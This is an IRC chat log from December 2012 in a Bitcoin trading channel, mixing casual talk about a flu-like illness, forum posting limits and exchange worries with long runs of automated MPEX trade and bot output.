for me Dec 29 23:49:31 If that's not flu nor cold, what the hell is it then? Dec 29 23:50:05 flu like symptoms Dec 29 23:50:15 Ive never gotten it before Dec 29 23:50:50 Well might be your first ever cold... some people rarely get symptoms and usually have asymptomatic colds. Dec 29 23:51:56 most likely not Dec 29 23:54:55 Well the two can be nearly identical, except for severity. Dec 29 23:55:40 this feels like flu Dec 29 23:55:45 Im just still alive Dec 29 23:56:01 If you have flu, you'd probably be sick like hell. Colds already feel like hell sometimes. Dec 29 23:56:26 no, when I was a kid and got the flu, I would be in bed sick for 2 weeks Dec 29 23:56:31 and everything would hurt Dec 29 23:56:39 and my nose would flow with snot constantly Dec 29 23:56:47 its the curse of being a severe asthamtic Dec 29 23:57:39 I have COPD and the docs wanted me to get a flu shot. I passed on it. Dec 29 23:58:09 yes. Hence why I'm proposing cold... the symptoms are mostly identical, except for severity and headache/muscle aches which are more frequent with flu. Dec 29 23:59:52 asa1024: trust me, get it Dec 30 00:00:03 Namjies: I have the headache and the muscle aches Dec 30 00:00:05 just not as bad Dec 30 00:00:07 ergo, flu light Dec 30 00:00:24 Namjies: and it seems people who haven gotten flu shots are getting it Dec 30 00:00:26 so it seems to be flu related Dec 30 00:00:39 oh yeah? well when it was pitched to me they didn't have any in stock Dec 30 00:00:47 So might be a weak flu or strong cold. Dec 30 00:00:56 Didn't you get flu shot and still have it? Dec 30 00:01:01 asa1024: theres no reason for people not to get it Dec 30 00:01:09 Namjies: thats what Im saying Dec 30 00:01:22 Namjies: its only among those who have gotten flu shots Dec 30 00:01:54 It seems unlikely to affect only those who have gotten flu shots. Dec 30 00:02:19 so either they made the shot too strong, or theres something not quite right somewhere Dec 30 00:02:25 Unless the infection is due to flu shots themselves... Dec 30 00:02:46 or its the zombie plague and we're all fucked\ Dec 30 00:06:09 d00m! Dec 30 00:06:18 oh sorry wrong channel :D Dec 30 00:20:03 [MPEX] [S.MPOE] 3800 @ 0.000638 = 2.4244 BTC [-] Dec 30 00:31:04 [MPEX] [S.DICE] 738 @ 0.0036 = 2.6568 BTC [+] Dec 30 00:32:59 kakobrekla: do you have the power to get me out if bitcoin newbie jail on bitcointalk.org? I've been browsing there for a while but haven't posted. Dec 30 00:33:32 Specifically, I'd like to post on this thread saying I've had the same issue for x days: https://bitcointalk.org/index.php?topic=133738.0 Dec 30 00:34:28 pizzaman1337 sorry cant do that, try PMing theymos to unblock you Dec 30 00:34:39 ok, thanks Dec 30 00:34:40 i dunno what is the post limit but i think its failry low Dec 30 00:34:45 5 Dec 30 00:34:52 post some shit around the forums Dec 30 00:34:54 it will be faster Dec 30 00:34:57 But what am I going to post about? I'd hate to just spam Dec 30 00:34:58 :> Dec 30 00:35:06 seems destructive Dec 30 00:35:18 I'll find something... Dec 30 00:35:25 humm Dec 30 00:36:21 there's a "please let me out" thread, I'll try that Dec 30 00:36:30 :D Dec 30 00:38:10 dunno, find a few threads where you can write at least one non offtopic sentence in and you are good Dec 30 00:38:25 should take a few min tops Dec 30 00:42:08 [MPEX] [S.MPOE] 10050 @ 0.000638 = 6.4119 BTC [-] Dec 30 00:45:32 ok, now I just need to wait a few hours, nbd Dec 30 00:54:39 ;;seen smickles Dec 30 00:54:39 smickles was last seen in #bitcoin-assets 3 hours, 57 minutes, and 13 seconds ago: blockchain.info can do a lot of things, apparently Dec 30 00:55:11 https://bitcointalk.org/index.php?topic=133829.0 Dec 30 00:55:13 aww so cute Dec 30 00:55:48 im not going to through all that jazz. Dec 30 01:22:49 pizzaman1337 you should post here https://bitcointalk.org/index.php?topic=137.0;topicseen Dec 30 01:22:58 something like "darn it, too late again." Dec 30 01:23:41 kakobrekla: I can't post there until I'm out of jail Dec 30 01:23:46 I can only post in the newbie section Dec 30 01:23:49 awww any time now Dec 30 01:24:03 But I hit my limit of 5, I just need to wait for 4 hours to pass Dec 30 01:24:09 I should have just let myself stay logged in Dec 30 01:24:20 not like that will get me my BTC from campbx anyway... Dec 30 01:24:38 yeah, i hope that ends up ok Dec 30 01:24:48 seems kinda strange no answer and all Dec 30 01:29:19 yeah, losing 150 BTC wouldn't be as fun as it sounds (not that it sounds fun...) Dec 30 01:29:36 I should just use bitinstant next time and suck up the 4% Dec 30 01:29:44 better than 100% Dec 30 01:34:35 [MPEX] [S.MPOE] 6844 @ 0.000638 = 4.3665 BTC [-] Dec 30 01:35:09 [MPEX] [S.MPOE] 3710 @ 0.000638 = 2.367 BTC [-] Dec 30 01:38:11 hum Dec 30 01:38:36 how about blockchain, i just saw today they offer the option to buy bitcoins Dec 30 01:39:24 there, smpake is shutdown, metapool and bitbet now use blockchain instead of gox, im ready to enter 2013 gox free Dec 30 01:42:04 1 btc = 13.36 Dec 30 01:42:12 ;;bc,convert eur Dec 30 01:42:12 1 BTC = 13.36400 U.S. dollars = 10.1073968 Euros Dec 30 01:42:15 ya Dec 30 01:42:28 what is their exchange rate from? Dec 30 01:42:29 ;;ticker Dec 30 01:42:30 BTCUSD ticker | Best bid: 13.36400, Best ask: 13.39933, Bid-ask spread: 0.03533, Last trade: 13.36400, 24 hour volume: 26155.21784806, 24 hour low: 13.27000, 24 hour high: 13.67000, 24 hour vwap: 13.48919 Dec 30 01:42:37 whose? Dec 30 01:42:41 blockchain Dec 30 01:42:43 gribble is tied to gox Dec 30 01:42:49 blockchain i dunno Dec 30 01:42:52 it goes through bitinstant, but where does bitinstant get their coins? Dec 30 01:43:00 gox Dec 30 01:43:09 lol Dec 30 01:44:05 where do you see that documented? Dec 30 01:44:22 uh oh, bitinstant ssl error... Dec 30 01:44:58 im lookin at bitinstant Dec 30 01:45:06 but all i can see is deposit to exchange Dec 30 01:45:21 ah Dec 30 01:45:26 output to 'bitcoin address' Dec 30 01:45:43 but it doesn't say where it comes from Dec 30 01:46:00 they want to know my first and last name? :( Dec 30 01:46:05 yes Dec 30 01:46:08 okfac Dec 30 01:46:08 Pizza Man Dec 30 01:46:12 :D Dec 30 01:46:14 ofac Dec 30 01:52:04 [MPEX] [S.MPOE] 9752 @ 0.000638 = 6.2218 BTC [-] Dec 30 01:55:21 does blockchain.info make money on anything besides their mixer? Dec 30 02:00:36 not that i would know about Dec 30 02:02:43 it's a nice site, they should find another way to monetize Dec 30 02:03:13 speaking of that, are there any businesses that "need to exist" in the bitcoin world that would really help bitcoin? Dec 30 02:06:28 it would be nice if it was easier to turn cash to btc and back... Dec 30 02:06:40 the bitcoin debit card is really interesting for me for that reason Dec 30 02:06:46 just got to an atm and pull out value Dec 30 02:08:09 [MPEX] [S.MPOE] 4007 @ 0.000638 = 2.5565 BTC [-] Dec 30 02:08:10 [MPEX] [S.MPOE] 3926 @ 0.00063988 = 2.5122 BTC [+] Dec 30 02:12:28 pizzaman1337 nothing in the purvey of the average person with an internet connection, unfortunately. Dec 30 02:14:05 [MPEX] [S.MPOE] 8800 @ 0.00063988 = 5.6309 BTC [+] Dec 30 02:19:21 [MPEX] [S.MPOE] 9313 @ 0.00063988 = 5.9592 BTC [+] Dec 30 02:21:06 [MPEX] [S.MPOE] 3800 @ 0.00063988 = 2.4315 BTC [+] Dec 30 02:43:51 ;;rate Namjies 4 Dec 30 02:43:52 Rating entry successful. Your rating for user Namjies has changed from 2 to 4. Dec 30 02:45:25 [MPEX] [S.MPOE] 8446 @ 0.00063988 = 5.4044 BTC [+] Dec 30 02:45:53 pizzaman1337: good luck getting the banks on your side pizzaman1337 bitcoin liquidity isn't really an issue anymore Dec 30 02:48:11 pizza, coins are easy to get Dec 30 02:50:33 ;;rate Namjies 4 repaid 1 month 100 btc loan great to deal with Dec 30 02:50:35 Rating entry successful. Your rating for user Namjies has changed from 4 to 4. Dec 30 02:54:44 [MPEX] [S.MPOE] 7232 @ 0.00063988 = 4.6276 BTC [+] Dec 30 02:59:38 [MPEX] [S.MPOE] 8700 @ 0.00063988 = 5.567 BTC [+] Dec 30 03:02:20 [MPEX] [S.MPOE] 4050 @ 0.00063988 = 2.5915 BTC [+] Dec 30 03:20:23 [MPEX] [S.MPOE] 7800 @ 0.00063988 = 4.9911 BTC [+] Dec 30 03:24:20 [MPEX] [S.DICE] 2000 @ 0.00357926 = 7.1585 BTC [-] Dec 30 03:27:21 [MPEX] [S.MPOE] 13500 @ 0.00063988 = 8.6384 BTC [+] Dec 30 03:35:40 [MPEX] [S.MPOE] 21800 @ 0.00063988 = 13.9494 BTC [+] Dec 30 03:46:28 [MPEX] [S.MPOE] 2100 @ 0.00063988 = 1.3437 BTC [+] Dec 30 03:46:32 [MPEX] [O.BTCUSD.P120T] 1 @ 0.10579371 BTC [+] Dec 30 03:46:50 [MPEX] [O.BTCUSD.C130T] 1 @ 0.16041482 BTC [-] Dec 30 03:47:03 [MPEX] [S.MPOE] 2211 @ 0.00063988 = 1.4148 BTC [+] Dec 30 03:47:09 [MPEX] [O.BTCUSD.P130T] 1 @ 0.13653422 BTC [+] Dec 30 03:47:27 [MPEX] [O.BTCUSD.C140T] 1 @ 0.12667655 BTC [+] Dec 30 03:47:52 [MPEX] [O.BTCUSD.C150T] 1 @ 0.09470433 BTC [+] Dec 30 04:06:40 Anyone knows how to precisely schedule dividends for 0:00 GMT on BTCT.co? Dec 30 04:07:06 [MPEX] [S.MPOE] 7000 @ 0.00063988 = 4.4792 BTC [+] Dec 30 04:16:04 [MPEX] [O.BTCUSD.P120T] 1 @ 0.105975 BTC [+] Dec 30 04:16:33 [MPEX] [O.BTCUSD.C130T] 1 @ 0.16007948 BTC [-] Dec 30 04:16:51 [MPEX] [O.BTCUSD.P130T] 1 @ 0.13677851 BTC [+] Dec 30 04:17:09 [MPEX] [O.BTCUSD.C140T] 1 @ 0.12622478 BTC [-] Dec 30 04:19:54 [MPEX] [S.MPOE] 3415 @ 0.00063988 = 2.1852 BTC [+] Dec 30 04:24:21 [MPEX] [S.MPOE] 10400 @ 0.00063988 = 6.6548 BTC [+] Dec 30 04:26:23 [MPEX] [S.MPOE] 7350 @ 0.00063988 = 4.7031 BTC [+] Dec 30 04:31:28 [MPEX] [S.DICE] 400 @ 0.00353938 = 1.4158 BTC [-] Dec 30 04:34:53 [MPEX] [S.MPOE] 13296 @ 0.00063988 = 8.5078 BTC [+] Dec 30 04:40:58 [MPEX] [S.MPOE] 5600 @ 0.00063988 = 3.5833 BTC [+] Dec 30 04:44:48 [MPEX] [O.BTCUSD.P120T] 1 @ 0.10590116 BTC [-] Dec 30 04:45:09 [MPEX] [O.BTCUSD.C130T] 1 @ 0.1600014 BTC [-] Dec 30 04:45:13 Ah well... I just transferred the first BTC-BONDs to BTCT.co and user goes around selling them for 0.008 each. Would have liked to buy them back =/ Dec 30 04:45:25 [MPEX] [O.BTCUSD.P130T] 1 @ 0.13670042 BTC [-] Dec 30 04:45:37 Namjies: such is the rational market Dec 30 04:45:48 [MPEX] [O.BTCUSD.C140T] 1 @ 0.12614989 BTC [-] Dec 30 04:47:53 Well people never contact me and make the request for the 0.01 BTC per bond buyback =/ Dec 30 04:51:28 why didn't youy put a buy order in ? Dec 30 04:54:36 I probably should have done that first. Dec 30 04:54:38 [MPEX] [S.MPOE] 3433 @ 0.00063988 = 2.1967 BTC [+] Dec 30 04:54:39 [MPEX] [S.MPOE] 4917 @ 0.00064 = 3.1469 BTC [+] Dec 30 04:55:17 I don't usually keep a bid wall tho, I use funds elsewhere. Dec 30 04:55:28 ya but this sort of thing happens all the time Dec 30 04:56:37 Aye Dec 30 04:58:25 [MPEX] [S.DICE] 1034 @ 0.00346561 = 3.5834 BTC [-] Dec 30 04:59:50 [MPEX] [S.MPOE] 11700 @ 0.00064 = 7.488 BTC [+] Dec 30 05:23:39 [MPEX] [S.MPOE] 13000 @ 0.00064 = 8.32 BTC [+] Dec 30 05:26:10 [MPEX] [S.MPOE] 2989 @ 0.00064 = 1.913 BTC [+] Dec 30 05:34:02 heh Dec 30 05:34:04 speaking of which Dec 30 05:34:07 I should go pester ukto Dec 30 05:34:28 I think I told him I got the final list Dec 30 05:34:33 but I havent looked at it yet Dec 30 05:34:36 you did Dec 30 05:34:39 then i distracted you Dec 30 05:34:43 with useless bullshit Dec 30 05:34:45 that I finally got working Dec 30 05:34:46 :P Dec 30 05:34:46 well no Dec 30 05:35:01 then I spend the past 4 days alternating between dying and sleeping Dec 30 05:35:51 [MPEX] [S.MPOE] 8400 @ 0.00064 = 5.376 BTC [+] Dec 30 05:39:41 Diablo-D3: pester away heh, i did enough to you already :P Dec 30 05:40:02 fucking mini-flu Dec 30 05:41:51 [MPEX] [S.MPOE] 9100 @ 0.00064 = 5.824 BTC [+] Dec 30 05:47:50 [MPEX] [S.MPOE] 9221 @ 0.00064 = 5.9014 BTC [+] Dec 30 05:48:23 http://www.caa.co.uk/default.aspx?catid=1052&pagetype=90&pageid=6347 Dec 30 05:48:28 this is kinda funny to read Dec 30 05:48:32 from a btc perspective. Dec 30 05:48:36 reads almost like the forum Dec 30 05:49:10 yeah, how would that work Dec 30 05:50:04 they have a list of failures too Dec 30 05:58:53 sigh. Dec 30 05:58:55 what an asshole. Dec 30 05:59:02 james swapped formats to csv Dec 30 05:59:59 [MPEX] [S.MPOE] 10377 @ 0.00064 = 6.6413 BTC [+] Dec 30 06:03:11 [MPEX] [S.MPOE] 5550 @ 0.00064 = 3.552 BTC [+] Dec 30 06:09:11 [MPEX] [S.DICE] 804 @ 0.00353458 = 2.8418 BTC [+] Dec 30 06:09:41 I guess the count is close enough Dec 30 06:09:49 11648 Dec 30 06:12:26 Buglouse: maybe I just have the impression coins are that easy to get because campbx.com is holding on to mine... Dec 30 06:12:41 bugpowder* Dec 30 06:12:45 who is apparently gone now, so nvm Dec 30 06:26:42 [MPEX] [S.MPOE] 16684 @ 0.00064 = 10.6778 BTC [+] Dec 30 06:36:50 [MPEX] [S.MPOE] 23000 @ 0.00064 = 14.72 BTC [+] Dec 30 06:42:29 aww how sweet Dec 30 06:42:43 your quit message RBecker Dec 30 06:42:59 i thought i pinged O.o Dec 30 06:43:35 but thank you Dec 30 06:43:35 one day i won't hate people who are happy Dec 30 06:51:18 apparently, there's a bad vice.com article about everything Dec 30 06:51:38 i wonder how many cents this experiment in becoming the new about.com actually cost. Dec 30 06:54:32 heh Dec 30 06:57:52 [MPEX] [S.MPOE] 4692 @ 0.00064 = 3.0029 BTC [+] Dec 30 07:24:49 [MPEX] [S.MPOE] 3576 @ 0.00064 = 2.2886 BTC [+] Dec 30 07:30:38 [MPEX] [S.MPOE] 1900 @ 0.00064 = 1.216 BTC [+] Dec 30 07:42:30 looks like S.DICE is up to +20,000 this month now Dec 30 07:42:38 - http://www.reddit.com/r/bitcoin 372 372 Dec 30 07:42:44 - http://forums.somethingawful.com/showthread.php 444 444 Dec 30 07:42:48 funny, sa owns reddit. Dec 30 07:42:52 whodda thunk it. Dec 30 07:43:12 those links are busted Dec 30 07:43:28 whadda ya mean ? Dec 30 07:43:59 they don't work Dec 30 07:44:14 they're reflinks Dec 30 07:49:00 [MPEX] [S.MPOE] 7687 @ 0.00064 = 4.9197 BTC [+] **** BEGIN LOGGING AT Sun Dec 30 15:55:43 2012 **** ENDING LOGGING AT Sun Dec 30 15:56:17 2012 **** BEGIN LOGGING AT Sun Dec 30 15:57:22 2012 Dec 30 16:05:20 [MPEX] [S.MPOE] 23500 @ 0.00064 = 15.04 BTC [+] Dec 30 16:06:33 [MPEX] [S.MPOE] 12386 @ 0.00064 = 7.927 BTC [+] Dec 30 16:10:41 [MPEX] [S.MPOE] 6150 @ 0.00064 = 3.936 BTC [+] Dec 30 16:17:35 [MPEX] [S.MPOE] 8941 @ 0.00064 = 5.7222 BTC [+] Dec 30 16:21:31 [MPEX] [S.MPOE] 7704 @ 0.00064 = 4.9306 BTC [+] Dec 30 16:25:03 [MPEX] [S.MPOE] 7500 @ 0.00064 = 4.8 BTC [+] Dec 30 16:26:03 [MPEX] [S.MPOE] 6799 @ 0.00064 = 4.3514 BTC [+] Dec 30 16:27:48 [MPEX] [S.MPOE] 10550 @ 0.00064 = 6.752 BTC [+] Dec 30 16:41:26 [MPEX] [S.MPOE] 5250 @ 0.00064 = 3.36 BTC [+] Dec 30 16:45:06 [MPEX] [S.MPOE] 8750 @ 0.00064 = 5.6 BTC [+] Dec 30 16:51:19 [MPEX] [S.MPOE] 1600 @ 0.00064 = 1.024 BTC [+] Dec 30 16:54:35 [MPEX] [S.MPOE] 5000 @ 0.00064 = 3.2 BTC [+] Dec 30 16:57:38 [MPEX] [S.MPOE] 25000 @ 0.00064 = 16 BTC [+] Dec 30 16:58:30 [MPEX] [S.DICE] 400 @ 0.00357778 = 1.4311 BTC [+] Dec 30 16:58:31 [MPEX] [S.DICE] 1007 @ 0.00355584 = 3.5807 BTC [-] Dec 30 16:58:32 [MPEX] [S.DICE] 350 @ 0.0034757 = 1.2165 BTC [-] Dec 30 16:58:34 [MPEX] [S.DICE] 1316 @ 0.00346561 = 4.5607 BTC [-] Dec 30 16:58:35 [MPEX] [S.DICE] 1498 @ 0.00346013 = 5.1833 BTC [-] Dec 30 16:58:36 [MPEX] [S.DICE] 628 @ 0.00345868 = 2.1721 BTC [-] Dec 30 16:58:37 [MPEX] [S.DICE] 4801 @ 0.00343244 = 16.4791 BTC [-] Dec 30 16:59:35 [MPEX] [S.MPOE] 5350 @ 0.00063914 = 3.4194 BTC [-] Dec 30 16:59:36 [MPEX] [S.MPOE] 10600 @ 0.00063907 = 6.7741 BTC [-] Dec 30 16:59:37 [MPEX] [S.MPOE] 7200 @ 0.00063893 = 4.6003 BTC [-] Dec 30 16:59:38 [MPEX] [S.MPOE] 1979 @ 0.00063817 = 1.2629 BTC [-] Dec 30 16:59:39 [MPEX] [S.MPOE] 8048 @ 0.00063794 = 5.1341 BTC [-] Dec 30 16:59:40 [MPEX] [S.MPOE] 10800 @ 0.00063773 = 6.8875 BTC [-] Dec 30 16:59:41 [MPEX] [S.MPOE] 3200 @ 0.00063768 = 2.0406 BTC [-] Dec 30 16:59:43 [MPEX] [S.MPOE] 3400 @ 0.00063761 = 2.1679 BTC [-] Dec 30 16:59:44 [MPEX] [S.MPOE] 6050 @ 0.00063747 = 3.8567 BTC [-] Dec 30 16:59:45 [MPEX] [S.MPOE] 6807 @ 0.00063742 = 4.3389 BTC [-] Dec 30 16:59:46 [MPEX] [S.MPOE] 11883 @ 0.00063741 = 7.5743 BTC [-] Dec 30 16:59:47 [MPEX] [S.MPOE] 19550 @ 0.00063741 = 12.4614 BTC [-] Dec 30 16:59:48 [MPEX] [S.MPOE] 18600 @ 0.00063738 = 11.8553 BTC [-] Dec 30 16:59:48 [MPEX] [S.MPOE] 8063 @ 0.00063727 = 5.1383 BTC [-] Dec 30 16:59:49 [MPEX] [S.MPOE] 39700 @ 0.00063715 = 25.2949 BTC [-] Dec 30 16:59:50 [MPEX] [S.MPOE] 12550 @ 0.00063701 = 7.9945 BTC [-] Dec 30 16:59:51 [MPEX] [S.MPOE] 15884 @ 0.00063683 = 10.1154 BTC [-] Dec 30 16:59:52 [MPEX] [S.MPOE] 6453 @ 0.00063683 = 4.1095 BTC [-] Dec 30 16:59:53 [MPEX] [S.MPOE] 2500 @ 0.00063683 = 1.5921 BTC [-] Dec 30 16:59:55 [MPEX] [S.MPOE] 7700 @ 0.00063677 = 4.9031 BTC [-] Dec 30 16:59:56 [MPEX] [S.MPOE] 10650 @ 0.00063676 = 6.7815 BTC [-] Dec 30 16:59:57 [MPEX] [S.MPOE] 6900 @ 0.00063675 = 4.3936 BTC [-] Dec 30 16:59:58 [MPEX] [S.MPOE] 5423 @ 0.00063671 = 3.4529 BTC [-] Dec 30 16:59:58 [MPEX] [S.MPOE] 12050 @ 0.00063667 = 7.6719 BTC [-] Dec 30 16:59:59 [MPEX] [S.MPOE] 3737 @ 0.00063665 = 2.3792 BTC [-] Dec 30 17:00:00 [MPEX] [S.MPOE] 18550 @ 0.00063658 = 11.8086 BTC [-] Dec 30 17:00:01 [MPEX] [S.MPOE] 6724 @ 0.00063649 = 4.2798 BTC [-] Dec 30 17:00:02 [MPEX] [S.MPOE] 4200 @ 0.00063646 = 2.6731 BTC [-] Dec 30 17:00:03 [MPEX] [S.MPOE] 1000 @ 0.00063643 = 0.6364 BTC [-] Dec 30 17:00:04 [MPEX] [S.MPOE] 20100 @ 0.00063618 = 12.7872 BTC [-] Dec 30 17:00:05 [MPEX] [S.MPOE] 7908 @ 0.00063617 = 5.0308 BTC [-] Dec 30 17:00:06 [MPEX] [S.MPOE] 5900 @ 0.00063605 = 3.7527 BTC [-] Dec 30 17:00:07 [MPEX] [S.MPOE] 9448 @ 0.00063604 = 6.0093 BTC [-] Dec 30 17:00:07 [MPEX] [S.MPOE] 8396 @ 0.00063602 = 5.34 BTC [-] Dec 30 17:00:08 [MPEX] [S.MPOE] 4050 @ 0.00063595 = 2.5756 BTC [-] Dec 30 17:00:09 [MPEX] [S.MPOE] 1600 @ 0.00063582 = 1.0173 BTC [-] Dec 30 17:00:10 [MPEX] [S.MPOE] 2735 @ 0.00063574 = 1.7387 BTC [-] Dec 30 17:00:11 [MPEX] [S.MPOE] 4300 @ 0.00063571 = 2.7336 BTC [-] Dec 30 17:00:12 [MPEX] [S.MPOE] 2650 @ 0.00063564 = 1.6844 BTC [-] Dec 30 17:00:13 [MPEX] [S.MPOE] 3300 @ 0.00063529 = 2.0965 BTC [-] Dec 30 17:00:14 [MPEX] [S.MPOE] 6769 @ 0.00063515 = 4.2993 BTC [-] Dec 30 17:00:15 [MPEX] [S.MPOE] 8900 @ 0.0006351 = 5.6524 BTC [-] Dec 30 17:00:17 [MPEX] [S.MPOE] 6300 @ 0.00063503 = 4.0007 BTC [-] Dec 30 17:00:18 [MPEX] [S.MPOE] 10409 @ 0.00063503 = 6.61 BTC [-] Dec 30 17:00:18 [MPEX] [S.MPOE] 2303 @ 0.00063502 = 1.4625 BTC [-] Dec 30 17:00:19 [MPEX] [S.MPOE] 8800 @ 0.00063496 = 5.5876 BTC [-] Dec 30 17:00:20 [MPEX] [S.MPOE] 11800 @ 0.00063485 = 7.4912 BTC [-] Dec 30 17:00:21 [MPEX] [S.MPOE] 39850 @ 0.00063483 = 25.298 BTC [-] Dec 30 17:00:22 [MPEX] [S.MPOE] 2000 @ 0.00063469 = 1.2694 BTC [-] Dec 30 17:00:23 [MPEX] [S.MPOE] 5560 @ 0.00063469 = 3.5289 BTC [-] Dec 30 17:00:24 [MPEX] [S.MPOE] 3473 @ 0.00063468 = 2.2042 BTC [-] Dec 30 17:00:25 [MPEX] [S.MPOE] 671 @ 0.00063467 = 0.4259 BTC [-] Dec 30 17:00:26 [MPEX] [S.MPOE] 2600 @ 0.00063461 = 1.65 BTC [-] Dec 30 17:00:27 [MPEX] [S.MPOE] 3250 @ 0.00063457 = 2.0624 BTC [-] Dec 30 17:00:28 [MPEX] [S.MPOE] 5806 @ 0.00063457 = 3.6843 BTC [-] Dec 30 17:00:29 [MPEX] [S.MPOE] 7300 @ 0.00063456 = 4.6323 BTC [-] Dec 30 17:00:30 [MPEX] [S.MPOE] 4000 @ 0.00063454 = 2.5382 BTC [-] Dec 30 17:00:31 [MPEX] [S.MPOE] 14926 @ 0.00063452 = 9.4708 BTC [-] Dec 30 17:00:32 [MPEX] [S.MPOE] 7400 @ 0.00063439 = 4.6945 BTC [-] Dec 30 17:00:33 [MPEX] [S.MPOE] 14200 @ 0.00063434 = 9.0076 BTC [-] Dec 30 17:00:34 [MPEX] [S.MPOE] 11983 @ 0.00063433 = 7.6012 BTC [-] Dec 30 17:00:35 [MPEX] [S.MPOE] 6000 @ 0.00063423 = 3.8054 BTC [-] Dec 30 17:00:36 [MPEX] [S.MPOE] 2967 @ 0.00063415 = 1.8815 BTC [-] Dec 30 17:00:37 [MPEX] [S.MPOE] 29096 @ 0.00063406 = 18.4486 BTC [-] Dec 30 17:00:38 [MPEX] [S.MPOE] 3600 @ 0.00063396 = 2.2823 BTC [-] Dec 30 17:00:39 [MPEX] [S.MPOE] 21050 @ 0.00063391 = 13.3438 BTC [-] Dec 30 17:00:40 [MPEX] [S.MPOE] 8300 @ 0.00063377 = 5.2603 BTC [-] Dec 30 17:00:41 [MPEX] [S.MPOE] 8700 @ 0.00063358 = 5.5121 BTC [-] Dec 30 17:00:42 [MPEX] [S.MPOE] 10550 @ 0.00063353 = 6.6837 BTC [-] Dec 30 17:00:43 [MPEX] [S.MPOE] 3950 @ 0.00063351 = 2.5024 BTC [-] Dec 30 17:00:44 [MPEX] [S.MPOE] 1515 @ 0.0006335 = 0.9598 BTC [-] Dec 30 17:00:45 [MPEX] [S.MPOE] 24100 @ 0.00063342 = 15.2654 BTC [-] Dec 30 17:00:46 [MPEX] [S.MPOE] 7100 @ 0.0006333 = 4.4964 BTC [-] Dec 30 17:00:47 [MPEX] [S.MPOE] 11450 @ 0.00063327 = 7.2509 BTC [-] Dec 30 17:00:48 [MPEX] [S.MPOE] 11650 @ 0.00063313 = 7.376 BTC [-] Dec 30 17:00:49 [MPEX] [S.MPOE] 7800 @ 0.00063312 = 4.9383 BTC [-] Dec 30 17:00:50 [MPEX] [S.MPOE] 24750 @ 0.00063309 = 15.669 BTC [-] Dec 30 17:00:51 [MPEX] [S.MPOE] 5000 @ 0.00063293 = 3.1647 BTC [-] Dec 30 17:00:52 [MPEX] [S.MPOE] 11400 @ 0.00063292 = 7.2153 BTC [-] Dec 30 17:00:53 [MPEX] [S.MPOE] 10000 @ 0.00063288 = 6.3288 BTC [-] Dec 30 17:00:54 [MPEX] [S.MPOE] 5750 @ 0.00063281 = 3.6387 BTC [-] Dec 30 17:00:55 [MPEX] [S.MPOE] 11034 @ 0.00063273 = 6.9815 BTC [-] Dec 30 17:01:03 [MPEX] [S.DICE] 1450 @ 0.0036 = 5.22 BTC [+] Dec 30 17:11:43 [MPEX] [S.MPOE] 12400 @ 0.00064 = 7.936 BTC [+] Dec 30 17:20:57 [MPEX] [S.MPOE] 13591 @ 0.00064 = 8.6982 BTC [+] Dec 30 17:23:17 [MPEX] [S.MPOE] 23600 @ 0.00064 = 15.104 BTC [+] Dec 30 17:29:03 [MPEX] [S.MPOE] 6600 @ 0.00064 = 4.224 BTC [+] Dec 30 17:40:41 who is countsparkle ?! Dec 30 17:41:25 [MPEX] [S.MPOE] 2094 @ 0.00064 = 1.3402 BTC [+] Dec 30 17:50:23 [MPEX] [S.MPOE] 4399 @ 0.00064 = 2.8154 BTC [+] Dec 30 17:52:48 [MPEX] [S.MPOE] 23144 @ 0.00064 = 14.8122 BTC [+] Dec 30 17:53:43 [MPEX] [S.MPOE] 10950 @ 0.00064 = 7.008 BTC [+] Dec 30 18:14:22 Bugpowder: do you ever sell? Dec 30 18:14:58 mircea_popescu: could I pay you to come up with business ideas Dec 30 18:15:06 since money makes da world go round Dec 30 18:15:20 why would i need money ? Dec 30 18:15:40 ooh i have an idea Dec 30 18:15:43 You charge for your blog Dec 30 18:15:44 [MPEX] [S.MPOE] 1366 @ 0.00064 = 0.8742 BTC [+] Dec 30 18:15:46 :) Dec 30 18:15:46 I will sell bitcoin ceurities Dec 30 18:15:59 how about a business that comes up with business ideas for thestringpuller Dec 30 18:16:05 :D Dec 30 18:16:12 I like that idea pigeons Dec 30 18:16:17 13KFuRvwqQ5ZCyDAuqopYcUCXgGpdoRR14 Dec 30 18:16:44 You get .1 btc Dec 30 18:16:58 :P (not) Dec 30 18:17:02 :) Dec 30 18:17:38 wait, you were going to pay me bitcents to come up with business ideas ? Dec 30 18:18:02 That's about how much you're worth right? (sarcasm) Dec 30 18:18:03 unless the portfolio distribution gets so out of whack you can't rebalance via shifting distribution of future income, why sell? Dec 30 18:18:25 Bugpowder: that's the way I see MPOE atm Dec 30 18:18:35 It will be a bigger problem when I'm older and portfolio is much greater than income Dec 30 18:18:53 That's super long term though Dec 30 18:18:59 yeah Dec 30 18:19:05 which is how you invest Dec 30 18:19:15 goal = don't die poor Dec 30 18:19:31 for me, bitcoins are just fun :) Dec 30 18:19:54 and maybe they really will go >$100 someday Dec 30 18:20:06 and I will look like a genius to all my friends Dec 30 18:20:20 lol Dec 30 18:20:24 and make a few of them some money on the way Dec 30 18:20:27 they will trade over 100 by 2015. Dec 30 18:20:31 i look like a genius to all my friends because i go to the dentist Dec 30 18:21:37 well, I hope I haven't lost all my coins by 2012 Dec 30 18:21:39 2015 Dec 30 18:21:40 then Dec 30 18:22:52 or unless some really really rich person comes in and manipulates the coins Dec 30 18:22:55 [MPEX] [S.MPOE] 6385 @ 0.00064 = 4.0864 BTC [+] Dec 30 18:24:17 the hedgies don't believe in bitcoin yet Dec 30 18:24:29 if only there was a bitcoin ETF Dec 30 18:24:35 fuck that would drive the price up Dec 30 18:26:28 would it be legal though? Dec 30 18:26:38 that's all anyone cares about these days (sarcasm) Dec 30 18:27:29 bitcoins are more illegal than skateboards i say Dec 30 18:27:29 bitcoin is the BRK-A of currencies. Dec 30 18:27:52 skateboarding can be pretty illegal Dec 30 18:27:54 [MPEX] [S.MPOE] 13650 @ 0.00064 = 8.736 BTC [+] Dec 30 18:28:04 especially when the cops come and say "son there is no skating here" Dec 30 18:28:10 ;;google use a skate Dec 30 18:28:11 Use skate in a sentence | skate sentence examples: ; Skateboarding - Wikipedia, the free encyclopedia: ; How to Use a Skate Stone - YouTube: Dec 30 18:28:23 ;;google use a skate go to Dec 30 18:28:24 Thrasher Skateboard Magazine | September 1988: ; How To Skateboard: The Basics: ; Hockey Skate Guides: Dec 30 18:28:35 ;;google "use a skate go to" Dec 30 18:28:36 Thrasher Skateboard Magazine | September 1988: ; How To Skateboard: The Basics: ; Hockey Skate Guides: Dec 30 18:28:40 oh well Dec 30 18:28:42 ;;google use a skate to ollie Dec 30 18:28:43 Ollie (skateboarding) - Wikipedia, the free encyclopedia: ; How to Ollie on a Skateboard - Ollie Setup: ; Ollie - 